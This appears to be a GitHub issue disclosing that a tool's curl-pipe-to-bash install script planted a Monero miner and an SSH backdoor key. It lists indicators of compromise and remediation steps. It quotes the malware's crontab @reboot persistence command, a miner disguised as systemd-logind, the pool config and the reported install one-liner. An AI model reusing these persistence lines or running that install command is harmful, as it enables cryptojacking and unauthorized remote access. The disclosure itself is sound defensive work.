-
Notifications
You must be signed in to change notification settings - Fork 769
Open
Description
⚠️ Security Disclosure — Cryptominer and SSH Backdoor Installed via ccpm Install Script
Date discovered: 2026-02-22
Install method used: curl -sSL https://automaze.io/ccpm/install | bash
What happened
Running the ccpm install script from automaze.io silently installed a Monero (XMR) cryptominer and added persistence mechanisms across the system without any disclosure or consent.
Malicious payloads installed
| Location | Description |
|---|---|
/home/<user>/moneroocean/xmrig |
XMRig Monero miner binary |
/home/<user>/moneroocean/miner.sh |
Launch wrapper script |
/home/<user>/moneroocean/config_background.json |
Miner config — pool: 62.60.246.210:443, user: NEWVPS1 |
/var/tmp/systemd-logind |
Second miner binary disguised as the system's systemd-logind |
/var/tmp/config.json |
Config for the disguised miner |
Persistence mechanisms
The script added four separate persistence hooks to survive reboots and re-logins:
- crontab —
@reboot cd /var/tmp && nohup ./systemd-logind -c config.json >/dev/null 2>&1 & ~/.bashrc— Same command injected, runs on every shell open~/.profile— Launchesmoneroocean/miner.shon every login~/.ssh/authorized_keys— An unlabeled SSH public key was added (no comment/owner), enabling persistent remote access by an unknown party:ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIGdvNKk+q3C/YLcyfnv93Mc5HslWh4XhpHQEzPR4dita
Impact observed
- ~150% CPU consumed across 3 miner processes
- ~13 GB RAM consumed (4.5 GB per disguised
systemd-logindprocess) - System load average spiked to 49.09 (5-min avg)
- 1,051 zombie processes accumulated
- Potential unauthorized SSH access via the injected key
Mining pool details
{
"url": "62.60.246.210:443",
"user": "NEWVPS1",
"algo": "rx/0",
"nicehash": true,
"tls": true
}Remediation steps taken
- Killed all miner processes
- Deleted
/home/<user>/moneroocean/directory - Deleted
/var/tmp/systemd-logindand/var/tmp/config.json - Removed
@rebootcrontab entry - Removed injected lines from
~/.bashrcand~/.profile - Removed the unlabeled backdoor key from
~/.ssh/authorized_keys
This is a serious supply chain attack. Users who ran the ccpm install script should immediately audit their systems using the above indicators of compromise.
If this was an unintentional inclusion or a compromised CDN/domain, please advise. If this is intentional, this repository should be reported to GitHub Trust & Safety.
/cc @automazeio
Reactions are currently unavailable
Metadata
Metadata
Assignees
Labels
No labels